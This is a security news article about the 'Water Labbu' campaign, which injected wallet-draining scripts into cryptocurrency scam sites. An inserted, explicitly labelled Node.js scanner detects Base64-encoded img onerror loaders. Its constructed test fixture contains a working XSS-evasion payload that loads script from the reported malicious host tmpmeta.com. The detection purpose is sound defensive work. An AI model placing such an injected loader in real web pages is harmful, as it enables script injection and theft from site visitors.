Hackers compromise scam sites to redirect crypto transactions

Obanla Opeyemi

October 18, 2022 - TuxCare expert team

According to Trend Micro researchers, a threat actor tracked as ‘Water Labbu’ is compromising cryptocurrency scam sites and injecting malicious JavaScript into them in order to steal from the people those sites have already scammed.

Some context: ‘dApps’ (decentralized applications) are used for liquidity mining, in which investors lend their cryptocurrency to a decentralized exchange in exchange for high returns generated from trading fees.

But fraudsters have built scam versions of these dApps, which impersonate cryptocurrency liquidity mining services in order to steal the funds victims deposit.

As soon as an investor connects a wallet to the dApp, Water Labbu’s script checks whether the wallet holds a large enough balance and, if so, attempts to drain it using several methods.

Water Labbu is reported to have taken at least $316,728 from nine identified victims and to have compromised at least 45 fraudulent websites.

To compromise these sites, the threat actor locates cryptocurrency scam sites and injects malicious scripts into their ‘dApps’, written so that they blend in with the site’s own code.

“In one of the cases we analyzed, Water Labbu injected an IMG tag to load a Base64-encoded JavaScript payload using the “onerror” event, in what is known as an XSS evasion technique to bypass Cross-Site Scripting (XSS) filters. The injected payload then generates another script element that loads another script from the delivery server tmpmeta[.]com,” Trend Micro explained in its report.
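The pattern Trend Micro describes is worth being able to spot in a captured page: nothing in the HTML says `<script>`, and the delivery host never appears in plain text because it only exists inside the Base64 argument. The following Node.js scanner is an added example, not code from the article, TuxCare or Trend Micro. The sample page and the decoded loader body are constructed for the example; only the host tmpmeta.com comes from the report, and the `/loader.js` path, the `eval(atob(...))` handler shape and the function names are assumptions.

```javascript
// Added example: static scanner for an <img onerror="..."> handler that
// decodes a Base64 payload and injects a <script> element. Not code from
// the article or from Trend Micro; the sample page below is constructed.

// Hypothetical loader body: what a Base64 payload that "generates another
// script element" could decode to. Only the host tmpmeta.com is from the
// report; "/loader.js" is an assumption for the example.
const ASSUMED_LOADER =
  "var s=document.createElement('script');" +
  "s.src='https://tmpmeta.com/loader.js';document.body.appendChild(s);";

// Constructed sample HTML of a "dApp" page with one injected <img> tag.
// The Base64 is computed at runtime so the encoded string is exact.
const SAMPLE_HTML = `<html><body>
<h1>Liquidity mining pool</h1>
<img src="/logo.png" alt="logo">
<img src="x" onerror="eval(atob('${Buffer.from(ASSUMED_LOADER).toString("base64")}'))">
<button id="connect">Connect wallet</button>
</body></html>`;

// Attribute values may carry entity-encoded quotes; undo the common ones.
function decodeEntities(s) {
  return s
    .replace(/&quot;/g, '"')
    .replace(/&#39;/g, "'")
    .replace(/&#x27;/gi, "'")
    .replace(/&lt;/g, "<")
    .replace(/&gt;/g, ">")
    .replace(/&amp;/g, "&");
}

// Pull every URL assigned to a .src property in a decoded payload.
function extractScriptUrls(js) {
  const urls = [];
  const re = /\.src\s*=\s*(["'])([^"']+)\1/g;
  let m;
  while ((m = re.exec(js)) !== null) urls.push(m[2]);
  return urls;
}

// Find <img> tags with an onerror handler, decode any atob('...') argument
// inside the handler, and list the hosts the payload would load scripts from.
function scanHtml(html) {
  const findings = [];
  const imgRe = /<img\b[^>]*\bonerror\s*=\s*(["'])([\s\S]*?)\1[^>]*>/gi;
  const b64Re = /atob\(\s*(["'])([A-Za-z0-9+/=]+)\1\s*\)/g;
  let m;
  while ((m = imgRe.exec(html)) !== null) {
    const handler = decodeEntities(m[2]);
    const finding = { tag: m[0], handler, payloads: [], scriptHosts: [] };
    let b;
    b64Re.lastIndex = 0;
    while ((b = b64Re.exec(handler)) !== null) {
      const decoded = Buffer.from(b[2], "base64").toString("utf8");
      finding.payloads.push(decoded);
      for (const url of extractScriptUrls(decoded)) {
        try {
          finding.scriptHosts.push(new URL(url).hostname);
        } catch {
          // relative or malformed URL: nothing to resolve offline
        }
      }
    }
    findings.push(finding);
  }
  return findings;
}

// Why a plain string match for the delivery host misses this injection:
// the host only exists inside the Base64 argument, never in the page text.
function hostVisibleInSource(html, host) {
  return html.includes(host);
}

if (typeof require !== "undefined" && require.main === module) {
  for (const f of scanHtml(SAMPLE_HTML)) {
    console.log("onerror handler:", f.handler);
    console.log("decoded payload:", f.payloads);
    console.log("would load scripts from:", f.scriptHosts);
  }
}
```

Run it with `node` against a saved copy of a page; a real triage script would also follow the decoded `src` in a sandbox, since the second-stage script from the delivery server is where the wallet-draining logic lives, not in the injected tag itself.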

Once the connected wallet’s balance exceeds 0.005 ETH or 22,000 USDT, the script treats the target as worth pursuing and then determines whether the victim is running Windows or a mobile OS (Android or iOS). If the victim is on a mobile device, Water Labbu’s script sends a transaction-approval request through the dApp page; because the injected script runs in the scam site’s own page, the request appears to the victim to come from the scam website itself.

If the victim approves the request, the malicious script drains the available funds from the wallet and sends them to an address controlled by Water Labbu.

The sources for this piece include an article in BleepingComputer.
